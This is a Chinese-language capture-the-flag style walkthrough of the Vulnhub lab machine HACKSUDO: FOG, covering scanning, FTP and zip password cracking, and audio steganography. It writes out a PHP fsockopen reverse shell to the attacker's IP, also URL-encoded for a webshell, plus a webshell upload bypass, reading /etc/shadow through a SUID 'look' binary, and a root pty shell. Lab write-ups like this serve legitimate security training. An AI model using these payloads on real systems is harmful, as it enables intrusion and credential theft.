环境
Kali: 192.168.132.131
靶机:192.168.132.146
靶机地址:https://www.vulnhub.com/entry/hacksudo-fog,697/
一、信息收集
nmap -sP 192.168.132.0/24
![图片[1]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226130458367.png?imageView2/0/format/webp/q/75)
nmap -p- -sC -sV 192.168.132.146
![图片[2]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210458130.png?imageView2/0/format/webp/q/75)
![图片[3]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210459985.png?imageView2/0/format/webp/q/75)
gobuster dir -u http://192.168.132.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 400,403,404,500 -t 100 -x .php,.html,.txt,.bak,.zip
![图片[4]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210500789.png?imageView2/0/format/webp/q/75)
二、漏洞探测
http://192.168.132.146/index1.html
查看源代码,发现提示,提供一个脚本用来分离音频中的私密信息(目前不知道干什么用)
![图片[5]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210501608.png?imageView2/0/format/webp/q/75)
#该靶机可能需要暴力破解密码
http://192.168.132.146/dict.txt
![图片[6]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210503659.png?imageView2/0/format/webp/q/75)
http://192.168.132.146/fog/
存在目录遍历漏洞,但是没有文件
http://192.168.132.146/cms/
发现可能是用户名
![图片[7]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210504318.png?imageView2/0/format/webp/q/75)
靶机中开启ftp服务,有用户名尝试利用获得字典文件进行暴力破解,获得密码
medusa -M ftp -h 192.168.132.146 -u hacksudo -P /tmp/dict.txt
hydra -l hacksudo -P dict.txt ftp://192.168.132.146 ### 两个都可以![图片[8]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210504647.png?imageView2/0/format/webp/q/75)
登录ftp,下载文件flag1.txt和secr3tSteg.zip文件
![图片[9]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210506294.png?imageView2/0/format/webp/q/75)
获得提示
![图片[10]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210507501.png?imageView2/0/format/webp/q/75)
解压文件,发现有密码,暴力破解zip文件,密码为:fooled
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt secr3tSteg.zip![图片[11]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210508687.png?imageView2/0/format/webp/q/75)
解压文件
unzip secr3tSteg.zip
![图片[12]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210509558.png?imageView2/0/format/webp/q/75)
使用提供的脚本查看隐藏信息
python3 ExWave.py -f /root/hacksudoSTEGNO.wav
![图片[13]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210509435.png?imageView2/0/format/webp/q/75)
根据前两行,可以判断为凯撒密码,进行解密,得到用户fog的密码
![图片[14]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210510696.png?imageView2/0/format/webp/q/75)
wwww.localhost/fog Username=fog:password=hacksudoISRO三、漏洞验证
利用刚刚得到的密码登录,在cms界面进行登录
![图片[15]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210511997.png?imageView2/0/format/webp/q/75)
在站点中可以上传一句话木马文件,站点检测上传文件是否危险,修改后缀名,进行绕过,上传之后在修改文件后缀名
![图片[16]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210512644.png?imageView2/0/format/webp/q/75)
也可以找到cmsmsrce.txt,存在一句话木马,修改文件后缀名成php,进行反弹获得shell
http://192.168.132.146/cms/uploads/cmsmsrce.txt
![图片[17]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210513676.png?imageView2/0/format/webp/q/75)
反弹代码
php -r \'$sock=fsockopen(\"192.168.132.131\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");\'
需要将传递内容,进行url编码
http://192.168.132.146/cms/uploads/shell.php?cmd=php%20-r%20\'%24sock%3dfsockopen(%22192.168.132.131%22%2c4444)%3bexec(%22%2fbin%2fsh%20-i%20%3c%263%20%3e%263%202%3e%263%22)%3b\'
开启监听端口,反弹获得shell
![图片[18]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210513127.png?imageView2/0/format/webp/q/75)
四、提权
#查找高权限命令
find / -perm -u=s -type f 2>/dev/null
![图片[19]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210514152.png?imageView2/0/format/webp/q/75)
look \'\' /etc/shadow
![图片[20]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://img.godyu.com/2023/12/20231226210515225.png?imageView2/0/format/webp/q/75)
破解isro用户的密码
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
![图片[21]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-278-1024x209.png)
使用isro的密码登录ssh
ssh isro@192.168.132.146
![图片[22]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](image-279.png)
在/home/isro/fog中,找到了一个root用户的可执行文件。
![图片[23]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-280-1024x147.png)
运行fog,获取python shell,检查id,它的权限是root。
![图片[24]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](image-281.png)
使用python的pty库获得root的shell
import pty; pty.spawn(\"/bin/bash\")
![图片[25]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-282-1024x178.png)
获得flag flag {4356a779ce18252fa1dd2d2b6ab56b19}
![图片[26]-Vulnhub 靶场 HACKSUDO: FOG-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-283-1024x530.png)
五、总结
这套靶机难易程度容易,使用nmap扫描靶机,使用gobuster扫描目录,在网站目录index1.html源码中发现提供一个脚本(分离音频中的私密信息),在网站目录dict.txt可能时密码字典,在网站cms目录发现可能是用户名,使用medusa工具使用发现的用户名和密码字典进行暴力破解,登录下载文件,发现flag,zip文件存在密码,使用fcrackzip工具进行破解密码,解压文件,使用提供的脚本查看隐藏信息,根据前两行,可以判断为凯撒密码,进行解密,得到用户fog的密码,在cms界面进行登录,安装插件,上传一句话,获得shell,查找高权限命令,使用高权限命令look查看/etc/shadow,破解isro用户密码,在/home/isro/fog中,找到了一个root用户的可执行文件,为root权限的python解释器,使用python的pty库获得root的shell。
本文参考来源于:
本文作者:纸机
本文链接:https://www.cnblogs.com/confidant/archive/2021/09/24/15332903.html
暂无评论内容